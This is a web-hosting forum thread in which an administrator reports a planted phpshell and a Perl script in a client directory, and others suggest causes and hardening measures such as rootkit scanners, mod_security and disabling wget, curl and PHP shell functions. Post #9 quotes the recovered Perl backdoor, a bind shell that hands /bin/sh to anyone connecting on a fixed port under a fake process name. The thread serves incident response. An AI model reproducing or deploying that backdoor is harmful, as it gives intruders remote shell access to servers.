Results 1 to 19 of 19
  1. #1

    Server Hacked Again!

    In one of our servers I found a file in one of the clients directory called phpshell! I got a notification when user was trying to run it, I contacted the user and he declines it was him! now I want to know if there is any possible way of putting this file there without having FTP! does any one know what it is?

  2. #2
    Yep, it's possible. Hackers can use insecure php files and wget (from your server) to grab just about any file they want and run it.

    phpshell is just what is sounds like - it is a php program that allows someone to open up a session just like ssh.

  3. #3
    so user might be innocent? I looked at all his files, they are all HTML files no php file except that one.

  4. #4
    Join Date
    Apr 2000
    It can be uploaded via any PHP script, or CGI script, or something insecure that runs SSI commands, FTP, shell, frontpage (if you offer it), a control panel interface or filemanager, etc. Also, that one script might be it. Someone also might have guessed their password. It's hard to say without checking the logs. Check the FTP logs to see if it was uploaded, their command history file if they have shell, control panel access logs, and web access logs and look for any indications there. Someone uploaded it somehow. Check the time stamp to see (if it's at all true) how long ago it was modified, unless you've removed it or modified it since.

  5. #5
    Thank you so much for comments.
    I am using a program to stop hackers of this nature, the program have removed two files about this incedent. One is the phpshell.php from client directory, one is a .pl file which I have the source of it. Is it safe I post the source here?

  6. #6
    Join Date
    Apr 2000
    While a program or some type of scanning tool might help locate scripts that have a specific file name or string, you're going to have to manually check for any it didn't detect, since it's not possible for it to find all the scripts. You should consider taking some measures to prevent this from being repeated or to cause a problem on your server if someone (say a client even) tried to run it. I don't see why it would be a problem attaching the script to the thread/post, but I don't see the point.

  7. #7
    Join Date
    Apr 2005
    San Diego, CA
    Don't suspend his account just flag it as a problem. Tell him you are deleting the php file and let it be. Experiance high server load or anything suspicious?

  8. #8
    Join Date
    Mar 2003
    tail -f /var/log/nerd
    Seems like I am the activist for Chkrootkit and Root Kit Hunter lately... lol

    Anyway go and download those two scripts and install them on your server. Set up a cron to run them each night and to email you the findings. This will help you to determine if your box has been rooted or not.

    Google "Chkrootkit" and "Root Kit Hunter" for the web site addresses of the scripts.

    Hopefully the scripts find nothing!

    Mega Hosters Inc. - The Last Host You Will Ever Need!
    Hsphere Control Panel, 24/7 Phone Support, EasyApp, Shared SSL, Daily Backups, Dedicated IPs, PHP4 & PHP5, FFMPEG, Legal Adult Content Allowed + More!
    Treating A Customer The Way They Should Be Treated For Over 5.5 Years Now!

  9. #9
    Thanks for the help,

    box is not rooted.
    this is the perl script that hacker wanted to run from tmp directory:

    #rintf "BS\n";
    $port= 57337;
    $proto= getprotobyname('tcp');
    $cmd= "lpd";
    $system= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';
    $0 = $cmd;
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
    bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
    listen(SERVER, SOMAXCONN)or die "listen: $!";
    for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
    open(STDIN, ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");

    many thanks author of this script that stopped them:

    I was able to find out that hacker was coming from RU. So far my guess is they had FTP password somehow...

    Thanks again

  10. #10
    Join Date
    Dec 2004
    New York, NY
    You might want to install Mod_Security which can prevent things like this (provided you use a good rule set).

    You can find an installation guide with a good ruleset here:

    Secondly, you may want to install BFD & APF Firewall to make things even more secure.

    BFD Installation Guide:
    APF Firewall Installation Guide:

    MediaLayer, LLC - Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  11. #11

    While I'm a firm believer in using both chkrootkit and root kit hunter, they detect ROOT KITS.

    They do not detect some of the other types of hacks; and this can lead to a false sense of security.

    Security needs to be done in practical, manageable layers which are checked throughout the day.

    Some of those layes should include securing /tmp, /var/tmp, /dev/shm (if Linux-based), setting root only access to compilers and fetch like utilities, and using mod_security with a good rule set that works with your customer and user base.

    Thank you.
    Peter M. Abraham
    LinkedIn Profile

  12. #12
    I have disabled wget & curl... makes it harder for people to download binaries

    You might wish to google... GRsecurity

  13. #13
    Join Date
    Feb 2004
    Southern California

  14. #14
    Join Date
    Feb 2002
    Unfortunately users often have weak passwords, and don't realise holes exist in popular scripts they use, even going as far to think you'll keep their whole site upto date.

    Don't be too hard on them, but let them know the setup and policies you operate none the less.
    Matthew - Burton Hosting
    low cost shared, reseller, VPS & dedicated solutions for over five years - we've got what you need. - server monitoring service for all!

  15. #15
    Join Date
    Apr 2000
    I recommend setting policies for the passwords, so they will be rejected if they try and set them to a weak password. Of course, if you have a control panel interface that doesn't allow you to do this, it's probably not much of an option unless you consider creating your own addon/module with its API, if it has one, and replace the password change feature with your own.

  16. #16
    disable php functions - system, shell_exec

  17. #17
    Thank you every one for the help! Found the hole and fixed it.

  18. #18
    Which was... ?

  19. #19
    Join Date
    Apr 2000
    I wouldn't image the "hole" in this case was very relevant, as it was likely a script that allowed someone access or a weak password. Perhaps I'm wrong about it, but I'd bet money it was a common cause that's not specific, like a vulnerable script.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts